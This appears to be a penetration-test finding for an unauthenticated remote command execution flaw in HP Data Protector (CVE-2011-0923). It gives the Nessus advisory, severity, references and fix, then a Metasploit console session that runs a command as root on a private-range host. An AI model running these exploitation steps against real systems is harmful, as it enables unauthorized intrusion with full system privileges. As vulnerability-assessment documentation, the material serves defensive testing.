metasploit - HP Data Protector Remote Command Execution

53641 (1) - HP Data Protector Remote Command Execution

Synopsis

The remote service allows remote execution of arbitrary commands without authentication.

Description

The remote HP Data Protector client or server service is affected by a command execution vulnerability. A malicious user can send a specially crafted packet that causes this service to execute an arbitrary shell command with system privileges.

See Also

http://www.zerodayinitiative.com/advisories/ZDI-11-055/

http://archives.neohapsis.com/archives/bugtraq/2011-02/0076.html

http://www.nessus.org/u?6ca03389

Solution

1. Upgrade to Data Protector A.06.20 or later and

2. Enable encrypted control communication services on cell server and all clients in cell.

Risk Factor

Critical

CVSS Base Score

10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVSS Temporal Score

8.3 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)

References

BID

46234

CVE

CVE-2011-0923

XREF

OSVDB:72526

XREF

EDB-ID:17339

XREF

EDB-ID:17648

XREF

EDB-ID:18521

XREF

EDB-ID:27400

Exploitable with

CANVAS (true), Metasploit (true)

Plugin Information:

Publication date: 2011/05/03, Modification date: 2013/08/08

Hosts

192.168.1.92 (tcp/5555)


Nessus was able to exploit the vulnerability to execute the command
'/usr/bin/id' on the remote host, which produced the following output :
------------------------------ snip ------------------------------
sdp2
uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
sdp2
0
------------------------------ snip ------------------------------


Attack Details

msf auxiliary(hp_data_protector_cmd) > show options
 
Module options (auxiliary/admin/hp/hp_data_protector_cmd):
 
   Name   Current Setting            Required  Description
   ----   ---------------            --------  -----------
   CMD    Windows\System32\calc.exe  yes       File to execute
   RHOST                             yes       The target address
   RPORT  5555                       yes       The target port
    
msf auxiliary(hp_data_protector_cmd) > set CMD /usr/bin/id
CMD => /usr/bin/id
msf auxiliary(hp_data_protector_cmd) > set RHOST 192.168.1.92
RHOST => 192.168.1.92
msf auxiliary(hp_data_protector_cmd) > run
 
[*] 192.168.1.92:5555 - Sending command...
[*] �15 [12:1] ^B[2004] 1409833427 INET sdp2 uid=0(root) gid=0(root) egid=3(sys) groups=1(other),2(bin),4(adm),5(daemon),6(mail),7(lp),20(users)
 sdp2^F6 0
[*] Auxiliary module execution completed


